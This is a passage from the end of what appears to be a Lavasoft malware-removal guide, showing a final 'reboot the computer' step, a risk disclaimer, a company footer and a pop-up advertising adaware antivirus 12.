  7. Reboot the computer.
    8. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now